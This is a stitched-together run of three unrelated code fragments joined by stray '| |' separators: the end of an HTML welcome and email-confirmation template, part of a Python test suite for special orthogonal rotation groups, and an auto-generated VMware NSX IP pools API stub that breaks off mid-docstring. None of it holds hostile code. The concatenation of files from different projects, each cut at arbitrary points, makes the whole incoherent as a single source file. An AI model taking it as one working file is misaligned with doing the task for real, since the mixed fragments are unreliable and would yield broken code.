src: local('Lato Bold Italic'), local('Lato-BoldItalic'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format('woff');
}
}
/* CLIENT-SPECIFIC STYLES */
body,
table,
td,
a {
-webkit-text-size-adjust: 100%%;
-ms-text-size-adjust: 100%%;
}
table,
td {
mso-table-lspace: 0pt;
mso-table-rspace: 0pt;
}
img {
-ms-interpolation-mode: bicubic;
}
/* RESET STYLES */
img {
border: 0;
height: auto;
line-height: 100%%;
outline: none;
text-decoration: none;
}
table {
border-collapse: collapse !important;
}
body {
height: 100%% !important;
margin: 0 !important;
padding: 0 !important;
width: 100%% !important;
}
/* iOS BLUE LINKS */
a[x-apple-data-detectors] {
color: inherit !important;
text-decoration: none !important;
font-size: inherit !important;
font-family: inherit !important;
font-weight: inherit !important;
line-height: inherit !important;
}
/* MOBILE STYLES */
@media screen and (max-width:600px) {
h1 {
font-size: 32px !important;
line-height: 32px !important;
}
}
/* ANDROID CENTER FIX */
div[style*="margin: 16px 0;"] {
margin: 0 !important;
}
</style>
</head>
<body style="background-color: #f4f4f4; margin: 0 !important; padding: 0 !important;">
<!-- HIDDEN PREHEADER TEXT -->
<div style="display: none; font-size: 1px; color: #fefefe; line-height: 1px; font-family: 'Lato', Helvetica, Arial, sans-serif; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden;"> We're thrilled to have you here! Get ready to dive into your new account. </div>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<!-- LOGO -->
<tr>
<td bgcolor="#FFA73B" align="center">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td align="center" valign="top" style="padding: 40px 10px 40px 10px;"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFA73B" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="center" valign="top" style="padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;">
<h1 style="font-size: 48px; font-weight: 400; margin: 2;">Welcome!</h1> <img src=" https://img.icons8.com/clouds/100/000000/handshake.png" width="125" height="120" style="display: block; border: 0px;" />
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 20px 30px 40px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">We're excited to have you get started. First, you need to confirm your account. Just press the button below.</p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left">
<table width="100%%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#ffffff" align="center" style="padding: 20px 30px 60px 30px;">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="border-radius: 3px;" bgcolor="#FFA73B"><a href="secret_key" target="_blank" style="font-size: 20px; font-family: Helvetica, Arial, sans-serif; color: #ffffff; text-decoration: none; color: #ffffff; text-decoration: none; padding: 15px 25px; border-radius: 2px; border: 1px solid #FFA73B; display: inline-block;">Confirm Email</a></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr> <!-- COPY -->
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 0px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: | |
self.space(n)
self.assertAllClose(
group.is_tangent(gs.array(vec), base_point), gs.array(expected)
)
def test_skew_to_vector_and_vector_to_skew(self, n, point_type, vec):
group = self.space(n, point_type)
mat = group.skew_matrix_from_vector(gs.array(vec))
result = group.vector_from_skew_matrix(mat)
self.assertAllClose(result, vec)
def test_are_antipodals(self, n, mat1, mat2, expected):
group = self.space(n)
self.assertAllClose(group.are_antipodals(mat1, mat2), gs.array(expected))
def test_log_at_antipodals_value_error(self, n, point, base_point, expected):
group = self.space(n)
with expected:
group.log(point, base_point)
def test_from_vector_from_matrix(self, n, n_samples):
group = self.space(n)
groupvec = self.space(n, point_type="vector")
point = groupvec.random_point(n_samples)
rot_mat = group.matrix_from_rotation_vector(point)
self.assertAllClose(
group.rotation_vector_from_matrix(rot_mat), group.regularize(point)
)
def test_rotation_vector_from_matrix(self, n, point_type, point, expected):
group = self.space(n, point_type)
self.assertAllClose(
group.rotation_vector_from_matrix(gs.array(point)), gs.array(expected)
)
def test_projection(self, n, point_type, mat, expected):
group = self.space(n=n, point_type=point_type)
self.assertAllClose(group.projection(mat), expected)
def test_projection_shape(self, n, point_type, n_samples, expected):
group = self.space(n=n, point_type=point_type)
self.assertAllClose(
gs.shape(group.projection(group.random_point(n_samples))), expected
)
def test_skew_matrix_from_vector(self, n, vec, expected):
group = self.space(n=n, point_type="vector")
self.assertAllClose(group.skew_matrix_from_vector(gs.array(vec)), expected)
def test_rotation_vector_rotation_matrix_regularize(self, n, point):
group = SpecialOrthogonal(n=n)
rot_mat = group.matrix_from_rotation_vector(gs.array(point))
self.assertAllClose(
group.regularize(gs.array(point)),
group.rotation_vector_from_matrix(rot_mat),
)
def test_matrix_from_rotation_vector(self, n, rot_vec, expected):
group = SpecialOrthogonal(n)
result = group.matrix_from_rotation_vector(rot_vec)
self.assertAllClose(result, expected)
def test_compose_with_inverse_is_identity(self, space_args):
group = SpecialOrthogonal(*space_args)
point = gs.squeeze(group.random_point())
inv_point = group.inverse(point)
self.assertAllClose(group.compose(point, inv_point), group.identity)
def test_compose(self, n, point_type, point_a, point_b, expected):
group = SpecialOrthogonal(n, point_type)
result = group.compose(point_a, point_b)
self.assertAllClose(result, expected)
def test_regularize(self, n, point_type, angle, expected):
group = SpecialOrthogonal(n, point_type)
result = group.regularize(angle)
self.assertAllClose(result, expected)
def test_exp(self, n, point_type, tangent_vec, base_point, expected):
group = self.space(n, point_type)
result = group.exp(tangent_vec, base_point)
self.assertAllClose(result, expected)
def test_log(self, n, point_type, point, base_point, expected):
group = self.space(n, point_type)
result = group.log(point=point, base_point=base_point)
self.assertAllClose(result, expected)
def test_compose_shape(self, n, point_type, n_samples):
group = self.space(n, point_type=point_type)
n_points_a = group.random_uniform(n_samples=n_samples)
n_points_b = group.random_uniform(n_samples=n_samples)
one_point = group.random_uniform(n_samples=1)
result = group.compose(one_point, n_points_a)
self.assertAllClose(gs.shape(result), (n_samples,) + group.shape)
result = group.compose(n_points_a, one_point)
self.assertAllClose(gs.shape(result), (n_samples,) + group.shape)
result = group.compose(n_points_a, n_points_b)
self.assertAllClose(gs.shape(result), (n_samples,) + group.shape)
def test_rotation_vector_and_rotation_matrix(self, n, point_type, rot_vec):
group = self.space(n, point_type=point_type)
rot_mats = group.matrix_from_rotation_vector(rot_vec)
result = group.rotation_vector_from_matrix(rot_mats)
expected = group.regularize(rot_vec)
self.assertAllClose(result, expected)
class TestSpecialOrthogonal3Vectors(TestCase, metaclass=Parametrizer):
space = group = SpecialOrthogonal
class SpecialOrthogonal3TestData(TestData):
def tait_bryan_angles_matrix_test_data(self):
xyz = gs.array(
[
[
[cos_angle_pi_6, -sin_angle_pi_6, 0.0],
[sin_angle_pi_6, cos_angle_pi_6, 0.0],
[0.0, 0.0, 1.0],
],
[
[cos_angle_pi_6, 0.0, sin_angle_pi_6],
[0.0, 1.0, 0.0],
[-sin_angle_pi_6, 0.0, cos_angle_pi_6],
],
[
[1.0, 0.0, 0.0],
[0.0, cos_angle_pi_6, -sin_angle_pi_6],
[0.0, sin_angle_pi_6, cos_angle_pi_6],
],
]
)
zyx = gs.flip(xyz, axis=0)
data = {"xyz": xyz, "zyx": zyx}
smoke_data = []
for coord, order in itertools.product(coords, orders):
for i in range(3):
vec = gs.squeeze(
gs.array_from_sparse([(0, i)], [angle_pi_6], (1, 3))
)
smoke_data += [
dict(coord=coord, order=order, vec=vec, mat=data[order][i])
]
smoke_data += [
dict(coord=coord, order=order, vec=gs.zeros(3), mat=gs.eye(3))
]
return self.generate_tests(smoke_data)
def tait_bryan_angles_quaternion_test_data(self):
xyz = gs.array(
[
[cos_angle_pi_12, 0.0, 0.0, sin_angle_pi_12],
[cos_angle_pi_12, 0.0, sin_angle_pi_12, 0.0],
[cos_angle_pi_12, sin_angle_pi_12, 0.0, 0.0],
]
)
zyx = gs.flip(xyz, axis=0)
data = {"xyz": xyz, "zyx": zyx}
smoke_data = []
e1 = gs.array([1.0, 0.0, 0.0, 0.0])
for coord, order in itertools.product(["intrinsic", "extrinsic"], orders):
for i in range(3):
vec = gs.squeeze(
gs.array_from_sparse([(0, i)], [angle_pi_6], (1, 3))
)
smoke_data += [
dict(coord=coord, order=order, vec=vec, quat=data[order][i])
]
smoke_data += [dict(coord=coord, order=order, vec=gs.zeros(3), quat=e1)]
return self.generate_tests(smoke_data)
def quaternion_from_rotation_vector_tait_bryan_angles_test_data(self):
smoke_data = []
for coord, order in itertools.product(coords, orders):
for angle_type in elements:
point = elements[angle_type]
if angle_type not in angles_close_to_pi:
smoke_data += [dict(coord=coord, order=order, point=point)]
return self.generate_tests(smoke_data)
def tait_bryan_angles_rotation_vector_test_data(self):
smoke_data = []
for coord, order in itertools.product(coords, orders):
for angle_type in elements:
point = elements[angle_type]
if angle_type not in angles_close_to_pi:
smoke_data += [dict(coord=coord, order=order, point=point)]
return self.generate_tests(smoke_data)
def quaternion_and_rotation_vector_with_angles_close_to_pi_test_data(self):
smoke_data = []
angle_types = angles_close_to_pi
for angle_type in angle_types:
point = elements_all[angle_type]
smoke_data += [dict(point=point)]
return self.generate_tests(smoke_data)
def quaternion_and_matrix_with_angles_close_to_pi_test_data(self):
smoke_data = []
angle_types = angles_close_to_pi
for angle_type in angle_types:
point = elements_all[angle_type]
smoke_data += [dict(point=point)]
return self.generate_tests(smoke_data)
def rotation_vector_and_rotation_matrix_with_angles_close_to_pi_test_data(self):
smoke_data = []
angle_types = angles_close_to_pi
for angle_type in angle_types:
point = elements_all[angle_type]
smoke_data += [dict(point=point)]
return self.generate_tests(smoke_data)
def lie_bracket_test_data(self):
group = SpecialOrthogonal(3, point_type="vector")
smoke_data = [
dict(
tangent_vec_a=gs.array([0.0, 0.0, -1.0]),
tangent_vec_b=gs.array([0.0, 0.0, -1.0]),
base_point=group.identity,
expected=gs.zeros(3),
),
dict(
tangent_vec_a=gs.array([0.0, 0.0, 1.0]),
tangent_vec_b=gs.array([0.0, 1.0, 0.0]),
base_point=group.identity,
expected=gs.array([-1.0, 0.0, 0.0]),
),
dict(
tangent_vec_a=gs.array([[0.0, 0.0, 1.0], [0.0, 0.0, 1.0]]),
tangent_vec_b=gs.array([[0.0, 0.0, 1.0], [0.0, 1.0, 0.0]]),
base_point=gs.array([group.identity, group.identity]),
expected=gs.array([gs.zeros(3), gs.array([-1.0, 0.0, 0.0])]),
),
]
return self.generate_tests(smoke_data)
def group_exp_after_log_with_angles_close_to_pi_test_data(self):
smoke_data = []
for angle_type in angles_close_to_pi:
for angle_type_base in elements.values():
smoke_data += [
dict(
point=elements[angle_type],
base_point=angle_type_base,
)
]
return self.generate_tests(smoke_data)
def group_log_after_exp_with_angles_close_to_pi_test_data(self):
return self.group_exp_after_log_with_angles_close_to_pi_test_data()
def left_jacobian_vectorization_test_data(self):
smoke_data = [dict(n_samples=3)]
return self.generate_tests(smoke_data)
def left_jacobian_through_its_determinant_test_data(self):
smoke_data = []
for angle_type in elements:
point = elements[angle_type]
angle = gs.linalg.norm(SpecialOrthogonal(3, "vector").regularize(point))
if angle_type in [
"angle_0",
"angle_close_0",
"angle_2pi",
"angle_close_2pi_high",
]:
expected = 1.0 + angle**2 / 12.0 + angle**4 / 240.0
else:
expected = angle**2 / (4 * gs.sin(angle / 2) ** 2)
smoke_data += [dict(point=point, expected=expected)]
return self.generate_tests(smoke_data)
def inverse_test_data(self):
smoke_data = [dict(n_samples=3)]
return self.generate_tests(smoke_data)
def compose_and_inverse_test_data(self):
smoke_data = []
for point in elements.values():
smoke_data += [dict(point=point)]
return self.generate_tests(smoke_data)
def compose_regularize_test_data(self):
smoke_data = []
for element_type in elements:
point = elements[element_type]
if element_type not in angles_close_to_pi:
smoke_data += [dict(point=point)]
return self.generate_tests(smoke_data)
def compose_regularize_angles_close_to_pi_test_data(self):
smoke_data = []
for element_type in elements:
point = elements[element_type]
if element_type in angles_close_to_pi:
smoke_data += [dict(point=point)]
return self.generate_tests(smoke_data)
def regularize_extreme_cases_test_data(self):
smoke_data = []
for angle_type in [
"angle_close_0",
"angle_close_pi_low",
"angle_pi",
"angle_0",
]:
smoke_data += [
dict(
point=elements_all[angle_type],
expected=elements_all[angle_type],
)
]
point = elements_all["angle_close_pi_high"]
norm = gs.linalg.norm(point)
smoke_data += [
dict(point=point, expected=point / norm * (norm - 2 * gs.pi))
]
for angle_type in ["angle_in_pi_2pi", "angle_close_2pi_low"]:
point = elements_all[angle_type]
angle = gs.linalg.norm(point)
new_angle = gs.pi - (angle - gs.pi)
point_initial = point
expected = -(new_angle / angle) * point_initial
smoke_data += [dict(point=point, expected=expected)]
smoke_data += [
dict(
point=elements_all["angle_2pi"],
expected=gs.array([0.0, 0.0, 0.0]),
)
]
point = elements_all["angle_close_2pi_high"]
angle = gs.linalg.norm(point)
new_angle = angle - 2 * gs.pi
expected = new_angle * point / angle
smoke_data += [dict(point=point, expected=expected)]
return self.generate_tests(smoke_data)
def regularize_test_data(self):
point = (gs.pi + 1e-6) * gs.array(
[[1.0, 0.0, 0.0], [2, 0.5, 0.0], [0.0, 0.0, 0.0], [0.5, 0.0, 0.0]]
)
expected_2 = (
point[1]
/ gs.linalg.norm(point[1])
* (gs.linalg.norm(point[1]) - 2 * gs.pi)
)
expected = gs.array(
[
[-(gs.pi - 1e-7), 0.0, 0.0],
expected_2,
[0.0, 0.0, 0.0],
[(gs.pi + 1e-7) / 2.0, 0.0, 0.0],
]
)
smoke_data = [dict(point=point, expected=expected)]
return self.generate_tests(smoke_data)
testing_data = SpecialOrthogonal3TestData()
def test_tait_bryan_angles_matrix(self, coord, order, vec, mat):
group = self.space(3, point_type="vector")
mat_from_vec = group.matrix_from_tait_bryan_angles(vec, coord, order)
self.assertAllClose(mat_from_vec, mat)
vec_from_mat = group.tait_bryan_angles_from_matrix(mat, coord, order)
self.assertAllClose(vec_from_mat, vec)
def test_tait_bryan_angles_quaternion(self, coord, order, vec, quat):
group = self.space(3, point_type="vector")
quat_from_vec = group.quaternion_from_tait_bryan_angles(vec, coord, order)
self.assertAllClose(quat_from_vec, quat)
vec_from_quat = group.tait_bryan_angles_from_quaternion(quat, coord, order)
self.assertAllClose(vec_from_quat, vec)
def test_quaternion_from_rotation_vector_tait_bryan_angles(
self, coord, order, point
):
group = self.space(3, point_type="vector")
quat = group.quaternion_from_rotation_vector(point)
tait_bryan_angle = group.tait_bryan_angles_from_quaternion(quat, coord, order)
result = group.quaternion_from_tait_bryan_angles(tait_bryan_angle, coord, order)
self.assertAllClose(result, quat)
def test_tait_bryan_angles_rotation_vector(self, coord, order, point):
group = self.space(3, point_type="vector")
tait_bryan_angle = group.tait_bryan_angles_from_rotation_vector(
point, coord, order
)
result = group.rotation_vector_from_tait_bryan_angles(
tait_bryan_angle, coord, order
)
expected = group.regularize(point)
self.assertAllClose(result, expected)
def test_quaternion_and_rotation_vector_with_angles_close_to_pi(self, point):
group = self.space(3, point_type="vector")
quaternion = group.quaternion_from_rotation_vector(point)
result = group.rotation_vector_from_quaternion(quaternion)
expected1 = group.regularize(point)
expected2 = -1 * expected1
expected = gs.allclose(result, expected1) or gs.allclose(result, expected2)
self.assertAllClose(expected, gs.array(True))
def test_quaternion_and_matrix_with_angles_close_to_pi(self, point):
group = self.space(3, point_type="vector")
mat = group.matrix_from_rotation_vector(point)
quat = group.quaternion_from_matrix(mat)
result = group.matrix_from_quaternion(quat)
expected1 = mat
expected2 = gs.linalg.inv(mat)
expected = gs.allclose(result, expected1) or gs.allclose(result, expected2)
self.assertAllClose(expected, gs.array(True))
def test_rotation_vector_and_rotation_matrix_with_angles_close_to_pi(self, point):
group = self.space(3, point_type="vector")
mat = group.matrix_from_rotation_vector(point)
result = group.rotation_vector_from_matrix(mat)
expected1 = group.regularize(point)
expected2 = -1 * expected1
expected = gs.allclose(result, expected1) or gs.allclose(result, expected2)
self.assertAllClose(expected, gs.array(True))
def test_lie_bracket(self, tangent_vec_a, tangent_vec_b, base_point, expected):
group = self.space(3, point_type="vector")
result = group.lie_bracket(tangent_vec_a, tangent_vec_b, base_point)
self.assertAllClose(result, expected)
@geomstats.tests.np_autograd_and_torch_only
def test_group_exp_after_log_with_angles_close_to_pi(self, point, base_point):
"""
This tests that the composition of
log and exp gives identity.
"""
# TODO(nguigs): fix this test for tf
group = self.space(3, point_type="vector")
result = group.exp(group.log(point, base_point), base_point)
expected = group.regularize(point)
inv_expected = -expected
self.assertTrue(
gs.allclose(result, expected, atol=5e-3)
or gs.allclose(result, inv_expected, atol=5e-3)
)
def test_group_log_after_exp_with_angles_close_to_pi(self, tangent_vec, base_point):
"""
This tests that the composition of
log and exp gives identity.
"""
group = self.space(3, point_type="vector")
result = group.log(group.exp(tangent_vec, base_point), base_point)
metric = group.left_canonical_metric
reg_tangent_vec = group.regularize_tangent_vec(
tangent_vec=tangent_vec, base_point=base_point, metric=metric
)
expected = reg_tangent_vec
inv_expected = -expected
self.assertTrue(
gs.allclose(result, expected, atol=5e-3)
or gs.allclose(result, inv_expected, atol=5e-3)
)
def test_left_jacobian_vectorization(self, n_samples):
| |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.pools.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class IpBlocks(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.pools.ip_blocks'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _IpBlocksStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ip_block,
):
"""
Creates a new IPv4 address block using the specified cidr. cidr is a
required parameter. display_name & description are optional parameters
:type ip_block: :class:`com.vmware.nsx.model_client.IpBlock`
:param ip_block: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpBlock`
:return: com.vmware.nsx.model.IpBlock
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ip_block': ip_block,
})
def delete(self,
block_id,
):
"""
Deletes the IP address block with specified id if it exists. IP block
cannot be deleted if there are allocated subnets from the block.
:type block_id: :class:`str`
:param block_id: IP address block id (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'block_id': block_id,
})
def get(self,
block_id,
):
"""
Returns information about the IP address block with specified id.
Information includes id, display_name, description & cidr.
:type block_id: :class:`str`
:param block_id: IP address block id (required)
:rtype: :class:`com.vmware.nsx.model_client.IpBlock`
:return: com.vmware.nsx.model.IpBlock
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'block_id': block_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about configured IP address blocks. Information
includes the id, display name, description & CIDR of IP address blocks
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.IpBlockListResult`
:return: com.vmware.nsx.model.IpBlockListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
block_id,
ip_block,
):
"""
Modifies the IP address block with specifed id. display_name,
description and cidr are parameters that can be modified. If a new cidr
is specified, it should contain all existing subnets in the IP block.
Returns a conflict error if the IP address block cidr can not be
modified due to the presence of subnets that it contains. Eg: If the IP
block contains a subnet 192.168.0.1/24 and we try to change the IP
block cidr to 10.1.0.1/16, it results in a conflict.
:type block_id: :class:`str`
:param block_id: IP address block id (required)
:type ip_block: :class:`com.vmware.nsx.model_client.IpBlock`
:param ip_block: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpBlock`
:return: com.vmware.nsx.model.IpBlock
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'block_id': block_id,
'ip_block': ip_block,
})
class IpPools(VapiInterface):
"""
"""
ALLOCATEORRELEASE_ACTION_ALLOCATE = "ALLOCATE"
"""
Possible value for ``action`` of method :func:`IpPools.allocateorrelease`.
"""
ALLOCATEORRELEASE_ACTION_RELEASE = "RELEASE"
"""
Possible value for ``action`` of method :func:`IpPools.allocateorrelease`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.pools.ip_pools'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _IpPoolsStub)
self._VAPI_OPERATION_IDS = {}
def allocateorrelease(self,
pool_id,
allocation_ip_address,
action,
):
"""
:type pool_id: :class:`str`
:param pool_id: IP pool ID (required)
:type allocation_ip_address: :class:`com.vmware.nsx.model_client.AllocationIpAddress`
:param allocation_ip_address: (required)
:type action: :class:`str`
:param action: Specifies allocate or release action (required)
:rtype: :class:`com.vmware.nsx.model_client.AllocationIpAddress`
:return: com.vmware.nsx.model.AllocationIpAddress
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('allocateorrelease',
{
'pool_id': pool_id,
'allocation_ip_address': allocation_ip_address,
'action': action,
})
def create(self,
ip_pool,
):
"""
Creates a new IPv4 or IPv6 address pool. Required parameters are
allocation_ranges and cidr. Optional parameters are display_name,
description, dns_nameservers, dns_suffix, and gateway_ip.
:type ip_pool: :class:`com.vmware.nsx.model_client.IpPool`
:param ip_pool: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpPool`
:return: com.vmware.nsx.model.IpPool
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ip_pool': ip_pool,
})
def delete(self,
pool_id,
force=None,
):
"""
Deletes the specified IP address pool. By default, if the IpPool is
used in other configurations (such as transport node template), it
won't be deleted. In such situations, pass \"force=true\" as query
param to force delete the IpPool
:type pool_id: :class:`str`
:param pool_id: IP pool ID (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'pool_id': pool_id,
'force': force,
})
def get(self,
pool_id,
):
"""
Returns information about the specified IP address pool.
:type pool_id: :class:`str`
:param pool_id: IP pool ID (required)
:rtype: :class:`com.vmware.nsx.model_client.IpPool`
:return: com.vmware.nsx.model.IpPool
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'pool_id': pool_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about the configured IP address pools. Information
includes the display name and description of the pool and the details
of each of the subnets in the pool, including the DNS servers,
allocation ranges, gateway, and CIDR subnet address.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.IpPoolListResult`
:return: com.vmware.nsx.model.IpPoolListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
pool_id,
ip_pool,
):
"""
Modifies the specified IP address pool. Modifiable parameters include
the description, display_name, and all subnet information.
:type pool_id: :class:`str`
:param pool_id: IP pool ID (required)
:type ip_pool: :class:`com.vmware.nsx.model_client.IpPool`
:param ip_pool: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpPool`
:return: com.vmware.nsx.model.IpPool
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
